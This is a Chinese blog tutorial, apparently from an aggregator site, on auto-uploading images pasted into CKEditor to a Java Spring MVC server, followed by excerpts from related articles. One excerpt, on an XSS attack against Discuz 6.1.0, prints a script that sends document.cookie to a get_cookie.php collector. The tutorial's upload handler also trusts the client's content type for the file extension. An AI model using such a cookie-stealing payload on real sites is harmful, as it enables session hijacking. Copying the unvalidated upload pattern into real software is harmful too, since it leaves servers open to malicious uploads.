ckeditor java 上傳_CKEditor粘貼圖片自動上傳到服務器(Java版)

環境:java,springmvc,ckeditor,tomcat,maven

情況:在做項目的時候發現本地圖片粘貼到ckeditor中,img標簽的src中的值是“data:image/png;base64,”開頭的,后面會跟一串字符串,圖片越大字符串越長,這樣的圖片在保存的時候一旦放多了過后,后臺不知什么原因拿不到其它的參數,所以想把這種圖片上傳到后臺在顯示出來。研究了一天的發覺還是挺簡單的,主要是ckeditor怎么獲取img并獲取src 。下面看一下代碼。

流程:監聽change事件-》獲取圖片的二進制數據,將base64圖片轉換成formData再提交到服務器-》服務器接收上傳的文件,生成圖片到指定位置,并返回圖片的訪問地址-》js接收回調數據,獲得圖片url-》將獲得的url地址替換掉圖片的二進制數據

1,定義一個textarea

${article.content}

2,js方法

//粘貼圖片上傳

//延時加載uploadImage方法,否則被默認方法覆蓋

$(function(){setTimeout(uplaodImage,400);});

//使用FormData形式,將base64圖片轉換成formData再提交(圖片不限制大小)

function uplaodImage(){

CKEDITOR.instances.content.on('change',function(e){//content為textarea的id

var a = e.editor.document ;

var b = a.find("img");

var count = b.count();

for(var i=0;i

var src =b.getItem(i).$.src;//獲取img的src

if(src.substring(0,10)=='data:image'){ //判斷是否是二進制圖像,是才處理

var img1=src.split(',')[1];

var img2=window.atob(img1);

alert('img2 size='+img2.length);

var ia = new Uint8Array(img2.length);

for (var x = 0; x < img2.length; x++) {

ia[x] = img2.charCodeAt(x);

};

//獲得圖片的類型

var w1=src.indexOf(":");//獲得指定字符的第一個下標值

var w2=src.indexOf(";");

var imgType= src.substring(w1+1, w2);//返回一個包含從 start 到最后(不包含 end )的子字符串的字符串

var blob=new Blob([ia], {type:imgType});

var formdata=new FormData();

formdata.append('croppedImage',blob);

$.ajax({

type:"POST",

url:"${baseurl}article/uploadImage.action",//服務器url

async:false,//同步,因為修改編輯器內容的時候會多次調用change方法,所以要同步,否則會多次調用后臺

data:formdata,

processData: false,

contentType: false,

success:function(json){

var imgurl=json.resultInfo.sysdata.url; //獲取回傳的圖片url

//alert('返回的url='+imgurl);

//獲取并更改到現有的圖片標簽src的值

b.getItem(i).$.src=imgurl;

var a = CKEDITOR.instances.content.document.$.getElementsByTagName("img")[i]; //content為textarea的id

a.setAttribute('data-cke-saved-src',imgurl);

}

});

}

}

});

}

3,后臺方法

/**

* ckeditor粘貼圖片上傳并返回訪問路徑(不限制圖片大小)

* @param imgfile 圖片文件

* @return

*/

@RequestMapping(value = "uploadImage", method = RequestMethod.POST)

public @ResponseBody SubmitResultInfo uploadImage(@RequestParam("croppedImage") MultipartFile imgfile) {

try {

//獲取 文件后綴

String fileSuffixes =imgfile.getContentType().split("/")[1];// data:image/png

// 生成文件名稱

Calendar cal = Calendar.getInstance();

SimpleDateFormat sdf = new SimpleDateFormat("yyyyMMddHHmmssSSS");

String filename = sdf.format(cal.getTime());

// 生成圖片保存路徑

String filePath = "E:/temp/tempfile" + "/" + filename + "." + fileSuffixes;

// 圖片訪問路徑

String fileurl = "http://localhost:5080/upimg/" + filename + "." + fileSuffixes;

System.out.println("fileurl=" + fileurl);

// 寫文件到磁盤

File newFile = new File(filePath);

imgfile.transferTo(newFile);

//返回url

ResultInfo resultInfo = ResultUtil.createSuccess(Config.MESSAGE, 906, null);

resultInfo.getSysdata().put("url", fileurl);//返回的圖片訪問路徑

return ResultUtil.createSubmitResult(resultInfo);

} catch (Exception e) {

e.printStackTrace();

return ResultUtil.createSubmitResult(ResultUtil.createSuccess(Config.MESSAGE, 911, null));//500錯誤

}

}

4,其它環境配置

4.1在spinrg-mvc.xml中配置配置上傳解析器

4.2,pom.xml引入依賴

commons-fileupload

commons-fileupload

1.3.1

4.3,配置圖片的虛擬路徑,如

b3acf2745cca477ab4ffe0c7fd9afefc.png

部分參考:http://blog.csdn.net/modernzcl/article/details/18365151

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/533224.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/533224.shtml
英文地址,請注明出處:http://en.pswp.cn/news/533224.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

java 序列化聲明_顯式聲明默認Java類序列化方法的原因是什么?

我定期看到具有以下結構的Java類&#xff1a;class MyClass implements Serializable {private static final long serialVersionUID 1L;// ...private void writeObject(final java.io.ObjectOutputStream s) throws IOException {s.defaultWriteObject();}private void read…

java 百度poi_Android應用中使用百度地圖API之POI(三)

先看執行后的圖吧&#xff1a;POI(Point of Interest)。中文能夠翻譯為“興趣點”。在地理信息系統中。一個POI能夠是一棟房子、一個商鋪、一個郵筒、一個公交站等 具體&#xff1a;http://developer.baidu.com/map/sdkandev-4.htm主要應用 MKSearch 類&#xff1a;com.baidu.…

java 順序存儲鍵值對_java://Comparator、Comparable的用法(按照要求將map集合的鍵值對進行順序輸出)...

import java.util.*;public class Person implements Comparable//使Person的屬性具有比較性{private String name;private int age;public Person(String name,int age)//初始化構造函數{this.name name;this.age age;}public void set(String name,int age)//重新設置姓名和…

java日歷事件處理_日歷表的事件處理和管理(劉靜)

1 //添加gridview,顯示具體的日期2 SuppressLint("ResourceAsColor")3 private voidaddGridView() {4 LinearLayout.LayoutParams params newLinearLayout.LayoutParams(5 LayoutParams.FILL_PARENT, LayoutParams.FILL_PARENT);6 //取得屏幕的寬度和高度7 WindowMa…

java第四次上機作業_第十java上機作業

第十java上機作業 第七章上級作業 7.1 public class Rectangle { double width1; double height1; String color“white“; public Rectangle(){} public Rectangle(double width,double height,String color) { this.widthwidth; this.heightheight; this.colorcolor; } publi…

java解析帶斜杠的參數_Java Spring MVC應用程序僅接受帶有斜杠的POST請求

war文件名是forms.war。 web.xml中的url模式為"/"控制器操作的RequestMapping為"/"如果遇到localhost&#xff1a;8080 /表單&#xff0c;則RequestMethod.GET操作正常工作如果針對localhost:8080/forms點擊發布數據&#xff0c;則不會觸發RequestMethod.P…

java文件編碼格式環境變量_Jenkins maven 構建亂碼,修改file.encoding系統變量編碼為UTF-8...

一切都是windows的控制臺默認編碼GBK問題情景&#xff1a;使用jenkins構建&#xff0c;console 輸出的中文亂碼。代碼編碼格式是utf-8&#xff0c;因為Jenkins會默認讀取當前系統的編碼格式&#xff0c;導致構建日志亂碼和selenium自動化測試輸入的中文亂碼。控制臺輸出亂碼摸索…

http multipart java_Http MultiPart請求

我正在嘗試使用httpClient庫上傳圖像(多部分/表單數據) . 我可以使用httpPost方法和byteArrayRequestEntity上傳圖像 . 以下是我使用的代碼&#xff1a;File file new File(imageFilePath);HttpClient client new HttpClient();PostMethod method new PostMethod("http…

java分布式會話redis_詳解springboot中redis的使用和分布式session共享問題

對于分布式使用NginxTomcat實現負載均衡&#xff0c;最常用的均衡算法有IP_Hash、輪訓、根據權重、隨機等。不管對于哪一種負載均衡算法&#xff0c;由于Nginx對不同的請求分發到某一個Tomcat&#xff0c;Tomcat在運行的時候分別是不同的容器里&#xff0c;因此會出現session不…

python3.8使用方法_python3.8新特性

python3.8新特性Python3.8穩定版已發布&#xff0c;官網發布了一篇介紹新特性的文章&#xff0c;在此記錄一下。新增賦值操作符:作用&#xff1a;把較大表達式中的某部分值賦給變量,因為看起來像海象的眼睛和牙齒&#xff0c;: 操作符有個特別的名字&#xff1a;海象操作符范例…

java責任鏈設計模式 訂單_Java責任鏈設計模式實例分析

本文實例講述了Java責任鏈設計模式。分享給大家供大家參考&#xff0c;具體如下&#xff1a;一 代碼abstract class AbstractHandler {private Handler Handler null;// 持有責任鏈中下一個責任處理者的引用public void setHandler( Handler handler ) {this.Handler handler…

java map去重復的數據_使用HashMap去重復數據.

因為HashMap是鍵值對形式&#xff0c;所以一個鍵只對應一個Value&#xff0c;利用這個原理&#xff0c;我們就可以根據某列重復數據做鍵對重復數據進行處理啦~首先先看看我要處理 的數據然后我最后想要的結果&#xff1a;需求&#xff1a;根據groupName每個分組信息只顯示一條數…

centos6.5 MySQL 服務器_啟用CentOS6.5 64位安裝時自帶的MySQL數據庫服務器

本人在虛擬機上又安裝了一臺linux機器&#xff0c;作為MySQL數據庫服務器用&#xff0c;在安裝時選擇了系統自帶的MySQL服務器端&#xff0c;以下是啟用步驟。首先開啟mysqld服務#service mysqld start進入/usr/bin目錄#cd /usr/bin設定mysql數據庫root用戶的密碼#mysqladmin -…

java xml date_W3C XML 模式時間數據類型與java Date進行轉換

W3C XML 模式時間數據格式:"2014-11-17T 09:40:25" 或者 “2014-11-17T 09:40:2508:00”要想把以上格式的時間轉換為能被java所使用個格式有以下3種辦法&#xff1a;(1)、jdk中有這么一個類XMLGregorianCalendar&#xff0c;使用XMLGregorianCalendar類中的toGreGreg…

PHP stomp 連接判斷,php實現通過stomp協議連接ActiveMQ操作示例

本文實例講述了php實現通過stomp協議連接ActiveMQ操作。分享給大家供大家參考&#xff0c;具體如下&#xff1a;前面介紹了php ActiveMQ的安裝與使用&#xff0c;這里再來講述一下php通過stomp協議連接ActiveMQ。一、安裝php的stomp擴展http://pecl.php.net/package/stomp如&am…

authinfo.php,【nginxphp】后臺權限認證方式

一、最常用的方法(代碼中限制)1、如何限制IPfunction get_new_ip(){if(getenv(HTTP_CLIENT_IP)) {$onlineip getenv(HTTP_CLIENT_IP);} elseif(getenv(HTTP_X_FORWARDED_FOR)) {$onlineip getenv(HTTP_X_FORWARDED_FOR);} elseif(getenv(REMOTE_ADDR)) {$onlineip getenv(RE…

php數組無限文類,php把無限級分類生成數組的類

你是否遇到需要把無限級分類循環出來&#xff0c;是不是很頭痛。比如&#xff0c;要循環出一個SELECT,或一個TABLE&#xff0c;要寫一大堆判斷。我的做法是生成數組&#xff0c;可以重復調用&#xff0c;直接循環數組就行了。為了方便&#xff0c;把它寫成了類&#xff1a;clas…

php sql取數據生成數組中,php中實現數組生成要執行的sql語句

本篇文章主要介紹php中實現數組生成要執行的sql語句&#xff0c;感興趣的朋友參考下&#xff0c;希望對大家有所幫助。會不會碰到這樣一種情況呢&#xff1f;每次獲取數據將數據和歷史版本都有一定的差別&#xff0c;然而用ThinkPHP的addAll()函數&#xff0c;卻會將已有的數據…

xss漏洞php注射實戰,利用XSS滲透DISCUZ 6.1.0實戰

論壇——>入侵者布置的跨站攻擊——>轉移被入侵這視線(隱蔽)論壇插入腳本&#xff1a;var img new Image();img.src get_cookie.php?var encodeURI(document.cookie);但是我不一樣&#xff0c;因為他需要誘導人去點擊他的鏈接&#xff0c;但是現在人不是傻子&#xf…

java模塊化按需加載,JavaScript模塊化之使用requireJS按需加載

模塊加載器的概念可能稍微接觸過前端開發的童鞋都不會陌生&#xff0c;通過模塊加載器可以有效的解決這些問題&#xff1a;JS文件的依賴關系。通過異步加載優化script標簽引起的阻塞問題可以簡單的以文件為單位將功能模塊化并實現復用主流的JS模塊加載器有requireJS&#xff0c…